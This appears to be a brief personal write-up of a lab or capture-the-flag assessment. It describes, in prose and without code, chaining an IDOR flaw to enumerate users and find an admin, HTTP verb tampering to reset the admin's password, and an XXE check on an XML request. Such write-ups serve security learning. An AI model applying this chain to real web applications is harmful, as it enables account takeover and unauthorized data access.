☑️SA

Key takeaway: know that whenever we have a web portal, there is most likely an admin portal as well.

Just like here, when we had the chance to read user details using the IDOR vulnerability, we found a user with its username, uid, company name. The company name for the admin user was Administrator (which I thought was a bit stupid, took me longer to find it). So next time just write a script to iterate through all possible results, and use regex to find strings like: admin, Admin.

Once we got the admin users uid, next is using IDOR to change the password for the user.

This wasn't possible at first because the POST request we sent had security protection against unauthorized data modification. So all we had to do was change it to GET (HTTP verb tampering in action). It will say 'parameter not found' if we don't pass the paramters we had with POST. Burp has an option to change the request type that adds the parameter for us which makes it easy. And vuala!

Once we had admin access, we find a web request that consists of an XML body. And boom XXE. I started with testing if the vulnerability exists (does it say the company name or just spits out $company;). Turns out it was vulnerable and the rest is ez pz.

Allons-y!!!